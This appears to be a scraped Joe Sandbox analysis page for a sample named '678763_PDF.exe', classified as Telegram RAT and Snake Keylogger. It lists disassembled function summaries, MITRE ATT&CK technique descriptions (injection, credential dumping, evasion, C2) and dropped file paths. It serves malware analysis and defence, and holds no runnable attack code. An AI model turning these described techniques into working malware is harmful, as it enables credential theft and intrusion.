Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32 ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Function 00406076 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040381C), ref: 004060AF

Strings

nsa, xrefs: 00406083

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 678763_PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23q5pkyc.sp4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4wq5heh.npl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b35hvi5f.gab.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tanz21lg.rfq.ps1

C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus

C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Stttepenge.Con

C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\preappearance.glu

C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\reaktiv.ove

C:\Users\user\AppData\Roaming\erstatningsgraden\storfavoritters.tid

Windows Analysis Report
678763_PDF.exe

Function 00403532 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre